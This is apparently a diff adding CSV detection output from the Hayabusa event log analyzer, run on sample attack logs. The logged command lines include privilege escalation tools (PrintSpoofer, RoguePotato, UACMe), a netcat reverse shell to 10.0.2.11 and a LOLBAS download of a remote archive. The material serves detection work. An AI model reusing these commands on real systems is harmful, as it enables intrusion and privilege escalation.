+2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time  :  Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0  :  Path: C:\BGinfo\BGINFO.EXE  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe  :  Path: C:\Windows\System32\SecurityHealthService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding  :  Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background  :  Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe""   :  Path: C:\Windows\regedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe""   :  Path: C:\Windows\regedit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe  -i -c powershell.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: PrintSpoofer.exe  -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx
+2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx
+2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe  -i -c ""c:\Windows\System32\cmd.exe""  :  Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: NetworkServiceExploit.exe  -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx
+2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe  -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999  :  Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe  :  Path: C:\Users\IEUser\Tools\Misc\nc64.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: RoguePotato.exe  -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe  58 c:\Windows\System32\cmd.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386  :  Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx
+2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx
+2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe  -p c:\Windows\System32\cmd.exe  :  Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: RogueWinRM.exe  -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: spooler.exe  payload.bin  :  Path: C:\Users\Public\tools\cinj\spooler.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: chost.exe  payload.bin  :  Path: C:\Users\Public\tools\evasion\chost.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe  /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr   :  Path: C:\Windows\System32\desktopimgdownldr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
